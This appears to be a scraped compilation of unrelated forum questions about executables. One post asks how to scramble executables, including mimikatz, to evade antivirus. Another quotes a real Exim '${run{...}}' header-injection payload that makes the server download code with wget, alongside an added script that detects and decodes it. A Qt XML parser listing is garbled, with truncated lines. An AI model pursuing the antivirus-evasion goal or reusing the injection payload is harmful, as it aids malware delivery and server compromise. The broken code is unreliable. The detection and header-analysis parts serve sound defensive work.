Executable scrambling with Hyperion is detected. What can I do?

I am using Hyperion v2.1 to scramble (apply polymorphism to) an .exe file:

hyperion.exe myexefile.exe scrambled.exe 

The resulting scrambled.exe file is detected and deleted by the AV or IDS system.

As far as I know, Hyperion performs some polymorphic changes, so generally it should work and be able to dodge AV defenses.

What can I do? Maybe increase some parameters in Hyperion's config? Scramble twice, or with another scrambler like PEScrambler?

How can I obfuscate a 64-bit executable Windows file?

Hyperion works OK when scrambling/obfuscating Win32 files, but I am trying a program that seems to be a Win64 executable, and it fails:

C:\Hyperion>hyperion.exe -v mimikatz.exe output.exe
-------------------------------
| Stage 1: Analyzing input file |
-------------------------------
Opening mimikatz.exe
Copied file to memory location: 0x5a0020
Found valid MZ signature
Found pointer to PE Header: 0x118
Found valid PE signature
Error: File is PE64, aborting...

https://github.com/Veil-Framework/Veil-Evasion/tree/master/tools/hyperion
https://github.com/Veil-Framework/Veil-Evasion/archive/hyperion.zip
https://github.com/Veil-Framework/Veil-Evasion/archive/Veil-Evasion.zip
https://github.com/Veil-Framework/hyperion/archive/hyperion.zip

How can I obfuscate 64-bit executables?

I don't mind using Linux or Windows for the job.
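Hyperion's "File is PE64" message refers to the PE32+ image format. Whether a Windows executable is PE32 (32-bit) or PE32+ (64-bit) is recorded in the Magic word that opens the PE optional header (0x10B for PE32, 0x20B for PE32+), next to the COFF Machine field. The script below, added here as an example and not part of the original post or of Hyperion itself, walks the same header path Hyperion's verbose output describes (MZ signature, e_lfanew pointer at offset 0x3C, "PE\0\0" signature, COFF header, Magic) so you can classify a file before handing it to a 32-bit-only tool. The header-only sample image it builds is constructed for the demonstration and is not a loadable executable.

```python
"""Classify a Windows executable as PE32 (32-bit) or PE32+ (64-bit).

Added example; not code from the original post or from Hyperion.
"""
import struct
import sys

# IMAGE_FILE_HEADER.Machine values from the PE/COFF specification
MACHINE_NAMES = {0x14C: "i386", 0x8664: "AMD64", 0xAA64: "ARM64", 0x1C0: "ARM"}
# IMAGE_OPTIONAL_HEADER.Magic values
OPTIONAL_MAGIC = {0x10B: "PE32", 0x20B: "PE32+", 0x107: "ROM"}


def pe_kind(data):
    """Describe a PE image from its headers; raise ValueError if it is not PE.

    Checks: 'MZ' at offset 0, e_lfanew at 0x3C, 'PE\\0\\0' at e_lfanew,
    Machine at e_lfanew+4, and Magic at e_lfanew+24 (4-byte signature
    plus 20-byte COFF header precede the optional header).
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    # signature (4) + COFF header (20) + Magic (2) must fit inside the file
    if e_lfanew + 26 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew=%#x" % e_lfanew)
    machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]
    magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]
    return {
        "e_lfanew": e_lfanew,
        "machine": MACHINE_NAMES.get(machine, "%#x" % machine),
        "format": OPTIONAL_MAGIC.get(magic, "%#x" % magic),
    }


def is_pe64(data):
    """True for a PE32+ image, the kind Hyperion rejects as 'PE64'."""
    return pe_kind(data)["format"] == "PE32+"


def build_minimal_pe(is64):
    """Constructed header-only image for the demonstration (not loadable)."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    machine = 0x8664 if is64 else 0x14C
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff_header = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0,
                              0xF0 if is64 else 0xE0, 0x22)
    optional_header = struct.pack("<H", 0x20B if is64 else 0x10B) + b"\0" * 30
    return dos_header + b"PE\0\0" + coff_header + optional_header


if __name__ == "__main__":
    # usage: python pe_kind.py file1.exe file2.exe ...
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            info = pe_kind(fh.read())
        print("%s: %s (%s), PE header at %#x"
              % (path, info["format"], info["machine"], info["e_lfanew"]))
```

Run it over the file you intend to scramble; a `PE32+` result means a PE32-only packer will abort exactly as shown above, and the `machine` value tells you whether the image is x64 or ARM64 as well.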

Create an executable application in Ubuntu with many dependencies?

We have coded an application with many dependencies. Right now we can use a makefile to compile the source code. What we want to do next is create an executable application (we don't want to release our source code) together with its dependencies: just a compressed file that other users can extract and use directly. Since we don't want to provide the source code, it seems that debmake can't work. How do we package the dependencies along with the main executable application? Thanks for any suggestions.

Error: The clangbackend executable

2019-08-29T08:24:45 Clang Code Model: Error: The clangbackend executable “C:\Qt\Qt5.11.2\Tools\QtCreator\bin\clangbackend.exe” could not be started (timeout after 10000ms).

#include "Xml.h"
#include

Xml::Xml() { }

QVariant Xml::domparser(QString str){
    // qDebug()<<" domparser str :::: "< result,finalResult;
    QDomDocument document;
    QString errorStr;
    int errorLine;
    int errorColumn;

    if(!document.setContent(str,false,&errorStr, &errorLine, &errorColumn)){
        // qDebug()<<"errorStr ::"<

    QDomElement rootElement = document.firstChildElement();

    // qDebug()<<"root:: "<

QVariant Xml::parseDomNode(QDomNode PNode) {
    QVariantMap tempMap;
    while(!PNode.isNull()) {
        QDomElement element = PNode.toElement(); // try to convert the node to an element.

        if(!element.isNull()) {
            QDomNodeList list = PNode.childNodes();
            if(list.count()<=1)
            {
                QDomElement tempElement = list.at(0).toElement();
                if(!tempElement.isNull()){
                    tempMap[element.tagName()] = QVariant::fromValue(formatDuplicateKeys(parseDomNode(list.at(0)).toMap()));
                }else{
                    if(tempMap.value(element.tagName()).isValid()){
                        QVariantList listDetails;
                        QString tagName = element.tagName();
                        if(tempMap.value(tagName).type() == QVariant::List){
                            listDetails = tempMap.value(tagName).toList();
                        }else{
                            listDetails.append(tempMap.value(tagName));
                        }
                        QVariantMap attrMap;
                        bool isElementHasAttr = parseXmlAttributesifContains(element,attrMap);
                        if(isElementHasAttr){
                            attrMap[XML_TAG_VALUE] = QVariant::fromValue(element.text());
                            listDetails.append(QVariant::fromValue(attrMap));
                        }else{
                            listDetails.append(QVariant::fromValue(element.text()));
                        }
                        tempMap[element.tagName()] = QVariant::fromValue(listDetails);
                    }else{
                        QVariantMap attrMap;
                        bool isElementHasAttr = parseXmlAttributesifContains(element,attrMap);
                        if(isElementHasAttr){
                            attrMap[XML_TAG_VALUE] = QVariant::fromValue(element.text());
                            tempMap[element.tagName()] = attrMap;
                        }else{
                            tempMap[element.tagName()] = QVariant::fromValue(element.text());
                        }
                    }
                }
            }
            else
            {
                tempMap.insertMulti(element.tagName(),QVariant::fromValue(formatDuplicateKeys(parseDomNode(list.at(0)).toMap())));
            }
        }
        PNode = PNode.nextSibling();
    }
    return QVariant::fromValue(tempMap);

}

bool Xml::parseXmlAttributesifContains(QDomElement attributeElemnt,QVariantMap& attrMap){
    if(attributeElemnt.hasAttributes()){
        QDomNamedNodeMap namedNodeMap = attributeElemnt.attributes();
        // qDebug()<<"attributesCount : "<

QVariantMap Xml::formatDuplicateKeys( QVariantMap result ) {
    QVariantMap finalResult;
    QVariantList tempList;
    QStringList uniqueKeys,allKeys,dupKeys;
    uniqueKeys = result.uniqueKeys();
    allKeys = result.keys();
    for(int i=0;i1&& dupKeys.count(allKeys.at(i))<1) dupKeys<

    }
    for(int j=0;j<dupKeys.size();j++) {
        tempList<<result.values(dupKeys.at(j));
        finalResult[dupKeys.at(j)] = tempList;
        tempList.clear();
    }
    return finalResult;

}

QVariantMap Xml::jsonParsing(const QString jsonStr){
    QJsonParseError *parseError = new QJsonParseError();
    QJsonDocument document = QJsonDocument::fromJson(jsonStr.toLatin1(),parseError);
    QVariantMap returnMap;
    if(parseError->error == QJsonParseError::NoError){
        returnMap = document.toVariant().toMap();
    }else{
        // qDebug()<<"Error Occurred While jsonParsing : "<errorString();
    }
    return returnMap;
}

//AADHAR CARD DATA PARSING PURPOSE FUNCTION
QVariant Xml::parseXMLData(QString data,QString tag,QStringList exceptTags) {
    QMap person;
    QVariant parsedVar;
    QXmlStreamReader xml(data);
    QVariantList varList;
    while(!xml.atEnd()&& !xml.hasError()) {
        QXmlStreamReader::TokenType token = xml.readNext();
        // qDebug()<<"ele start "<

                if(xml.name() == tag) { //if same as given tag
                    xml.readNext();
                    if(!xml.isCharacters()) {
                        continue;
                    }
                    else if(xml.isCharacters()) {//for single element
                        varmap[tempName] = xml.text().toString();
                    }
                }

    // qDebug()<<"tag ::before "<

                    while(xml.readNextStartElement())
                    {

    // qDebug()<<"reading inner data "<

    if(varList.isEmpty())
    {

    // qDebug()<<"VarList XML ";//<1) {
        parsedVar = QVariant::fromValue(varList);
    // qDebug()<<"VarList XML "<1) {
        parsedVar = QVariant::fromValue(varList.at(0));
    // qDebug()<<"VarList XML map "<=1){
        parsedVar = QVariant::fromValue(varList.at(0).toMap().value(varList.at(0).toMap().keys().at(0)));
    // qDebug()<<"VarList XML string"<

systemctl Service that runs an executable that never returns

I’m having some trouble figuring out how the services work on CentOS. Right now I have the following service file:

[Unit]
Description=SelfTester
After=network.target

[Service]
Type=simple
ExecStart=/usr/bin/selftester

[Install]
WantedBy=multi-user.target

This will launch a script that calls an executable that will never return:

#!/bin/bash
export LD_LIBRARY_PATH=SOMEPATH && cd SOMEOTHERPATH && ./EXECUTABLE

The executable never returns. When I launch the service, it runs for a while but then exits due to timeout:

Job for selftester.service failed because a timeout was exceeded. See "systemctl status selftester.service" and "journalctl -xe" for details. 

Thanks in advance

How to authenticate with a user’s Gitlab username and password through a bash executable

So this is an addendum to my question posed here. Thank you to @dessert, who helped a lot with that question.

So I am trying to authenticate a Gitlab user by using their username and password, and not by creating an impersonation token. At the moment, the code that @dessert has created, which uses an impersonation token to authenticate a user, is as follows:

$ curl -d '{"title":"test key","key":"'"$(cat ~/.ssh/id_rsa.pub)"'"}' -H 'Content-Type: application/json' https://gitlab.com/api/v4/user/keys?private_token=<my_access_token>

Mainly focusing on the `private_token=` part, except with the creation of an impersonation token, found here:

$ curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" --data "name=mytoken" --data "expires_at=2017-04-04" --data "scopes[]=api" https://gitlab.example.com/api/v4/users/42/impersonation_tokens

I want to be able to use the username and password of the Gitlab user to authenticate them. I’ve seen this done with Github, and have done it myself:

$ curl -u "USERNAME:PASSWORD" --data "{\"title\": \"TITLE\", \"key\": \"$(cat ~/.ssh/id_rsa.pub)\"}" https://api.github.com/user/keys

Where USERNAME and PASSWORD are the user-inputted username and password used for authentication.

I don’t need help with reading input of the user; that’s not the issue. My issue (to sum up) is to be able to authenticate a Gitlab user through their username and password.

Again, thanks to @dessert for the help, and any other assistance is appreciated!!

A quick edit: I found this forum post on authentication with login and password, and most are saying to use a Personal Access Token. Does this mean I have to get the user to give me their PAT for authentication? Or do I provide my PAT and somehow it does something? (I was a little unclear on this.)

Executable Code in Mail Headers [duplicate]

This question already has an answer here:

  • Unusual mail headers show evidence of MTA attack. Have I been pwned? 1 answer

Recently I noticed someone delivering email to my server root account with headers like this:

X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f45.79.163.30x22}}@host.example.com

I've never seen or heard of mail header injection. Can someone please identify what type of attack this is and which environments may be vulnerable to it?
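The local part of that recipient address is written in Exim string-expansion syntax: `${run{...}}` is the expansion item that executes a command, and `\xHH` and `\t` are escapes the expansion processes, so once decoded it spells out `/bin/sh -c "wget ..."`. The script below is an added example (not part of the original question or of the linked answer): it scans header lines for a `${run{` item, extracts the brace-balanced body, and decodes the escapes so the attempted command is readable in a log or alert. It executes nothing. The sample headers are constructed, use documentation IP ranges rather than the addresses in the post, and write the payload with the backslashes that the copy in the question appears to have lost; a lenient rule also decodes the bare `xHH` form seen above.

```python
"""Flag Exim ${run{...}} expansion items in mail headers and decode the command.

Added example, not from the original post. Nothing here runs the command.
"""
import re

# ${run{ ... }} is Exim's command-executing expansion item; allow stray
# whitespace after "$" because copied headers often gain it.
RUN_ITEM_RE = re.compile(r"\$\s*\{\s*run\s*\{")

# Escapes Exim expansion accepts (\xHH, \t, \n, \r, \<other>), plus a lenient
# bare "xHH" form for copies whose backslashes were stripped in transit.
ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})|\\([tnr])|\\(.)|x([0-9a-fA-F]{2})")
SIMPLE_ESCAPES = {"t": "\t", "n": "\n", "r": "\r"}

# Constructed sample headers (documentation addresses, not a real mailbox).
CONSTRUCTED_HEADERS = [
    "Received: from mail.example.net by host.example.com",
    "X-Original-To: root@host.example.com",
    r"X-Original-To: root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20203.0.113.10\x2fsbz\x2f203.0.113.11\x22}}@host.example.com",
    "Subject: invoice ${10} overdue",
]


def decode_exim_escapes(text):
    """Turn the escaped expansion body into the string Exim would run."""
    def replace(match):
        if match.group(1) is not None:
            return chr(int(match.group(1), 16))
        if match.group(2) is not None:
            return SIMPLE_ESCAPES[match.group(2)]
        if match.group(3) is not None:
            return match.group(3)
        return chr(int(match.group(4), 16))  # lenient bare xHH
    return ESCAPE_RE.sub(replace, text)


def extract_run_command(value):
    """Return the raw body of the first ${run{...}} item, or None.

    Braces are matched so nested expansion items stay inside the body; an
    unbalanced item (truncated header) yields None rather than a guess.
    """
    match = RUN_ITEM_RE.search(value)
    if match is None:
        return None
    start = match.end()
    depth = 1
    i = start
    while i < len(value) and depth:
        if value[i] == "{":
            depth += 1
        elif value[i] == "}":
            depth -= 1
        i += 1
    if depth:
        return None
    return value[start:i - 1]


def scan_headers(lines):
    """Return one finding per header line that carries a ${run{...}} item."""
    findings = []
    for line in lines:
        name, sep, value = line.partition(":")
        if not sep:
            continue
        raw = extract_run_command(value)
        if raw is None:
            continue
        findings.append({"header": name.strip(), "raw": raw,
                         "command": decode_exim_escapes(raw)})
    return findings


if __name__ == "__main__":
    for hit in scan_headers(CONSTRUCTED_HEADERS):
        print("%s: %r" % (hit["header"], hit["command"]))
```

Point it at the headers of a suspect message (or at a mail log that records RCPT TO addresses); a hit on `X-Original-To`, `To`, or `Delivered-To` shows the expansion item was offered as a recipient, and the decoded command tells you what the sender hoped the MTA would run.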

Is there anyway to create an executable backup of a folder?

I have to create an executable to restore a workspace to a certain stage (offline, so the files need to be stored with the executable). I know the shell commands I'd require, but I'm not sure how to package all this into a nice executable together with the files.

What I require is:

  • delete existing folder if exists
  • copy files to this location
  • catkin_make (it’s a ROS workspace)
  • reboot

Essentially I have to make an idiot-proof way to restore the software to a given version with just a double-click.

Thanks if anyone can assist me 🙂